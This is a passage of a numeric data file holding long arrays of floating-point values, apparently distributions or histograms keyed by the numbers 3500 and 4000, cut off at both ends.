0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
3500 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.130675171338496e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00010509075959489036, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00028795172607081637, 0.0, 0.0, 9.519253116751466e-05, 0.0, 0.0, 9.53770007759026e-05, 0.0, 0.0, 0.00019774159642445974, 0.0, 0.0, 0.00010498129895154257, 9.752656632661217e-05, 9.407685842804524e-05, 0.0, 0.00018725658380279008, 0.00018882862141813184, 9.692259053936547e-05, 0.0001596374237845921, 0.0, 9.408847278253293e-05, 0.0, 9.475751635187158e-05, 0.0, 0.0, 9.589348241165058e-05, 0.00018669502438176423, 3.566662833794227e-05, 0.0, 6.633279701057805e-07, 0.00011623939510149584, 0.00023202662293291142, 0.0, 9.275087487529994e-05, 0.0002012744345300422, 0.0001862394911993472, 9.341462496041126e-05, 0.00014612149516530557, 0.0002481984618631296, 0.00019741993653446107, 9.596265973787467e-05, 0.00020721650266771114, 9.372943561018971e-05, 0.0, 0.0003230492290234467, 0.00019072271030862772, 0.00038787036019044893, 9.405223051713915e-05, 0.0002864002948839085, 6.641705948261748e-07, 0.00019925774423960464, 0.00010009530537879838, 0.0003137715026215061, 0.0002931734498298973, 0.0002754375379722506, 0.00018757045512819546, 0.0, 0.0005997279276006298, 9.596148558240835e-05, 0.00019285943842623884, 9.351223641817808e-05, 0.00010335847911228242, 0.0003994379050135511, 0.0001251665284658218, 0.0004034893284500921, 2.710057957955393e-05, 0.0005473171109119394, 0.0003825009472429626, 0.00020703472383226687, 0.0003021568545949467, 0.0003654194509344699, 0.0003011753780406489, 0.0004010661063986986, 0.00022909886627763977, 0.0004982643397184118, 0.00044343957680651196, 0.00016534177436347544, 0.0006932489408309185, 0.0008139911047302091, 0.0005571404477898215, 0.00019284086720061322, 0.0004665353713831101, 0.0003088587383041298, 0.0004159473919173677, 0.00016993732101236737, 0.0005979168319323449, 0.0003074926866960963, 0.0003800735765089214, 0.00043721060378064744, 0.00020708137694279535, 0.0005680210725266104, 0.00029553074305185687, 0.0, 0.0005573798189508889, 0.0002868345171446118, 0.00013304537582981628, 0.00040763394069214334, 0.0002851634199464281, 0.0007785456212358768, 0.0010787536125878238, 0.000657086048346664, 0.00041112576163343566, 0.0006443692792916423, 0.00045959118112419385, 0.0003122378011821397, 0.000609336667997784, 0.0003880694186805059, 0.0009093141334931765, 0.0005626546341063053, 0.0008767530020403775, 0.0008983568364044369, 0.0005313404948972548, 0.0008518689686885723, 0.0010572265679912617, 0.0006354757169890242, 0.0003274066373745109, 0.000385668466444457, 0.0008420542814226254, 0.0007626820763925989, 0.00046753175971183015, 0.000597552021828959, 0.001512642413138702, 0.0015533461561963759, 0.00042917272684336866, 0.0007589333893737912, 0.0007793175110394363, 0.0013606323326172186, 0.0010708106074122238, 0.0017255764462804062, 0.0014505471230252798, 0.0011778632144526457, 0.0009922272000244719, 0.0015684539363044984, 0.001202647835974969, 0.0008013912424211175, 0.0017305482901869961, 0.001546878751333817, 0.0016280335591928121, 0.0012209017265165832, 0.0016428836513145927, 0.0017125437902664284, 0.0012839198245495028, 0.0023549063987276125, 0.00194616284198128, 0.0013626947758323272, 0.0017155356949486767, 0.0016421110570177533, 0.0022854458662050514, 0.002232510397715493, 0.001215801821387133, 0.0020357009633157454, 0.0027416934048078026, 0.0033997017131347463, 0.0020350033584146886, 0.002268660609320711, 0.0015326216859995597, 0.0024364336487005247, 0.0027935535034442727, 0.0033879617240121567, 0.0029156368659942265, 0.0020645156777836385, 0.002438835657676493, 0.002441985368853415, 0.0034505417055020766, 0.002901555767425855, 0.0031212521532832578, 0.001882580914493433, 0.003287713582730159, 0.0029367140524931253, 0.0039670292120274, 0.0033618625963067715, 0.003451895585031776, 0.0031243478533087288, 0.0031430316413050786, 0.003943271506875921, 0.004323357216324662, 0.002625114483083962, 0.0039257578039402765, 0.0033942955882596795, 0.0050165582516125545, 0.003618134394602263, 0.0040988395915684825, 0.005175196048356265, 0.004432317278058638, 0.003930083705786328, 0.004502927543613821, 0.0037867850760546357, 0.005004235568270545, 0.005730496751084424, 0.004906496362388982, 0.005118748289481785, 0.004481453962229492, 0.005523704490355952, 0.005273490394942305, 0.005143007593848476, 0.005774214159838988, 0.007580190510290576, 0.006498938607978545, 0.007267638465967134, 0.006711962346597876, 0.007160055766872183, 0.007741573325960483, 0.006958570688851483, 0.008027616384043763, 0.006491124055410961, 0.006965507912454632, 0.007033286428133173, 0.0075345224379212965, 0.007969065791006133, 0.007304825691680206, 0.008879706955007347, 0.009719468580466434, 0.00930794305803523, 0.008589718734557227, 0.011319061589399954, 0.010844771664793588, 0.014224548429327051, 0.012721626927571053, 0.010222910123882495, 0.012362371675419223, 0.015389424623274844, 0.01565643696955999, 0.015230812814505454, 0.01906925165094261, 0.017090268032596414, 0.016921746977907524, 0.01635859947247497, 0.018109406171415685, 0.021331014488283843, 0.019025690796250223, 0.02007964655849747, 0.023200653235011234, 0.02345841135757303, 0.025712153617200847, 0.018961324532910873, 0.021425620734273135, 0.019705622622336192, 0.02305949657795824, 0.016904155311048913, 0.01779913605910252, 0.017958248840870876, 0.015605664608547521, 0.01320737285223122, 0.011833960385302314, 0.011730064847479736, 0.009846339992453983, 0.008205800581666416, 0.008087698075809476, 0.0068239880499773855, 0.006234452418040672, 0.004989127788162423, 0.004247616987260091, 0.0040220996082628545, 0.003894180536491223, 0.0031874275553651146, 0.0019197823866261643, 0.0018729511175749163, 0.0021220417810383875, 0.001538804162468958, 0.001154480847665234, 0.0015677334745103637, 0.0012899480169906263, 0.0007547088562829989, 0.0013821809033973298, 0.0013596833018923067, 0.0008751287536453, 0.0007717716835195772, 0.0011809427111326815, 0.0008204830103034985, 0.0007205160401171691, 0.0005120452067340448, 0.00018562536875194573, 0.0005563956418390186, 0.0007167694665782006, 0.0006414536555761893, 0.00038011999478835667, 0.00039504726806279, 0.0005938407903695269, 0.00010751386423073721, 0.0002915600232343677, 0.0004151473223826165, 0.00014006710927265412, 0.0005997265577525856, 0.0002265689134943577, 0.0005981214089530937, 9.644529634230595e-05, 0.0005115322964878402, 0.0, 0.00010964734385155819, 0.0003086815386750042, 0.00043743733320119406, 0.0, 0.000289606522077276, 0.0002056294162931427, 0.00020578968851429552, 9.542344840922448e-05, 0.000321123105257978, 0.0003137907783404116, 0.00010234259001819252, 0.0, 9.758414886760633e-05, 0.0, 0.00017721446262301672, 0.0001949324490405443, 0.0, 2.0693489615605736e-05, 2.7891006362537966e-05, 0.00010333056356607064, 9.542344840922448e-05, 0.0, 0.00010333056356607064, 9.878813766740087e-05, 0.0, 0.0, 0.0, 9.111030571924056e-05, 0.0, 7.48718628201953e-05, 0.0003174288794835497, 0.00010333056356607064, 9.644529634230595e-05, 0.0, 0.0, 9.841572490737047e-05, 0.0, 0.0, 9.988976946441886e-05, 7.177537757825609e-06, 0.00010825679153279412, 0.0, 0.0, 0.0, 0.0, 9.644529634230595e-05, 0.0, 0.0, 0.0, 0.0, 9.599826600239085e-05, 0.0, 0.0, 0.0, 0.0, 0.00012590698025677054, 0.0, 0.0, 0.0, 0.0, 0.00010054394039785078, 0.0, 0.0, 0.0, 2.0693489615605736e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00011714821100168613, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.275929130372281e-05, 0.0, 0.0, 0.0, 0.0, 0.00010751386423073721, 0.0, 0.0, 0.0, 0.0, 0.00018407002371348348, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.7891006362537966e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
4000 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.621755382180972e-05, 9.569969132817099e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 9.47644518875752e-05, 9.450075595656066e-05, 0.0, 0.0, 0.00014955302499536656, 0.00010635460487071522, 0.0, 0.0, 0.0, 0.00019114807020996472, 2.033070560719565e-05, 0.0, 0.00039001051620217854, 0.0, 0.0002003645936609027, 0.0, 9.78542017186367e-05, 0.0002144610362504868, 0.00010837978811874046, 2.05770726399772e-05, 9.875589590479039e-05, 0.0002881475392209586, 0.00028302978957978607, 0.00019536564660850995, 0.0, 0.00010751338545552207, 0.0, 0.00031121589623286764, 9.65296476779989e-05, 0.0001920639223148698, 0.00020080608037931436, 0.00019089679531774864, 0.00019114720646425841, 9.455581035679811e-05, 0.0003034850153967957, 5.5441090740482904e-05, 0.00011233983685723907, 0.00019665690888529336, 0.00012959301651282567, 0.0001081040560790792, 0.00019494565964735337, 0.0, 0.0003335000284746822, 0.00019209441629371892, 0.0, 9.483558885732267e-05, 9.495395957324931e-05, 9.511398724242518e-05, 0.0003910025844771258, 0.0005565886825981236, 0.0004879506042873521, 0.0003013116434288953, 0.00030479944859100513, 0.0003011883155636976, 0.0001926934051639695, 0.0002127049097899794, 0.00040715560559345177, 0.0003938995500219534, 0.0, 0.0006020362402107839, 0.0002971297998146788, 0.00039338460736434365, 3.6816787537304577e-05, 0.0006057752451567875, 9.564851439507168e-05, 0.0002798708649838969, 0.00026103688985764506, 0.0002093828499180797, 0.0, 0.00017508829607575997, 0.00040562782720978194, 0.0005115008938492251, 0.0009770949051408349, 0.00039074946943101367, 0.00041897266081822527, 0.00029529576724687774, 0.000304916317140486, 0.0005075254854588185, 0.0003155323151835445, 0.0005068836848448636, 0.00024500158225942574, 0.00040352359245254805, 0.0005016966289992993, 0.0004961844292265483, 0.0003052976984239863, 0.00061399615146455, 0.0004047815066342354, 0.00044710632308526895, 0.0004598069150592829, 0.0007046767197672535, 0.0004910685760705134, 0.00028755487822686084, 0.0009063546575516925, 0.000757967576597371, 0.0003975044866126721, 0.0003972784481167449, 0.0006910043012111491, 0.0005710569113830357, 0.0007733719930654477, 0.0009308601747564303, 0.001047818929332363, 0.000819104398990387, 0.000428241853980168, 0.0008067676317295384, 0.0006075866325654186, 0.0003988093059416286, 0.0007849998879805377, 0.0005264773430969021, 0.001047753585091972, 0.0006904959680859007, 0.0012772909271046183, 0.0006884634617764523, 0.0006855307822243766, 0.0006330309662446013, 0.0002089718947326783, 0.0009087757743206614, 0.0010985739038770548, 0.0004912328004171972, 0.001109477003482061, 0.0005913803972027513, 0.0006905740807410806, 0.000691812992517229, 0.0007674237894818121, 0.000913156317001492, 0.0006428587399994034, 0.0007074621870076438, 0.0009524964038331039, 0.0015144888673407552, 0.0010432540708286365, 0.0011437630513068816, 0.0010782219520031919, 0.0005991071283040168, 0.0005143839643544293, 0.0018435561528506164, 0.0005412927601015926, 0.0007664485079168962, 0.001201903727615488, 0.0012340206470926175, 0.001624081673641535, 0.0011020679430299146, 0.0011140858003543263, 0.0012166947344154349, 0.0015091606829576109, 0.0014541391801653225, 0.0016066535385377177, 0.0014035292397909698, 0.001871127967312781, 0.0016419141919525536, 0.001497712972907691, 0.0019317672721789582, 0.0014225972900036336, 0.00242090661588317, 0.0008777204358707573, 0.0018442246169189838, 0.0018919669215483625, 0.0014845352177621784, 0.00167809777643167, 0.0017907063320889767, 0.001542008105977318, 0.0020116258954188883, 0.0020343813136059824, 0.002240610890829425, 0.0031326034852097603, 0.002694222646141388, 0.001342211556557883, 0.0016775350648810848, 0.0021947383327750956, 0.0026101049303777677, 0.0017580580963399786, 0.0030101561899825973, 0.003203121186839962, 0.0028024206908972707, 0.0041416660695913375, 0.002483239613416952, 0.0033653659785814736, 0.0036947781615072834, 0.002451093101260841, 0.0024388982136207956, 0.002903712375202084, 0.002943686226057166, 0.002564200526394788, 0.002988640059113263, 0.0028498278621925982, 0.0040575384395291755, 0.0029562383288780155, 0.0034598669692515413, 0.003961566227042121, 0.004271448744006482, 0.003955781083626173, 0.004339845386615257, 0.0031808491658151163, 0.004809050981584108, 0.004856006301212548, 0.00537094925925561, 0.004108931459271707, 0.004116473536562627, 0.003034624678784447, 0.00330908761312401, 0.0047685573811387895, 0.005215684133687721, 0.005454226362676177, 0.005555572725839617, 0.0045580236463982834, 0.006067946678827122, 0.006071828276922991, 0.007707547534453191, 0.006764152156248426, 0.006551684532425637, 0.0044448912853013375, 0.005897324004384265, 0.0064342601813598375, 0.005571513115295543, 0.005497291071210074, 0.00482605490488364, 0.006626363835977198, 0.0067786318390524875, 0.006765342472940054, 0.008500413216593712, 0.009570339679725108, 0.006957510420281293, 0.007219568163678402, 0.009341518270240516, 0.0084434630823017, 0.00840591733328956, 0.01012551996861784, 0.00947606611705493, 0.00980826241527133, 0.011165141725872284, 0.011606261915671162, 0.01092772732345131, 0.011930719052358955, 0.011491925417951286, 0.011857526292722128, 0.01299989383140089, 0.01608102468204649, 0.016009266791798663, 0.017783235234265653, 0.015121600586998789, 0.020152358417347034, 0.01902240838737558, 0.01968017102198333, 0.01994237477595897, 0.020898072296488008, 0.021904855493504776, 0.022626347239141004, 0.01982896962143547, 0.023663579950880097, 0.023064657776819715, 0.020089459703929776, 0.0195614373826434, 0.02186077111438749, 0.016034738727786286, 0.016980977406639605, 0.015834057702763582, 0.012672390301161074, 0.011890190601652096, 0.011007750734350343, 0.010671504595396149, 0.007619813803621315, 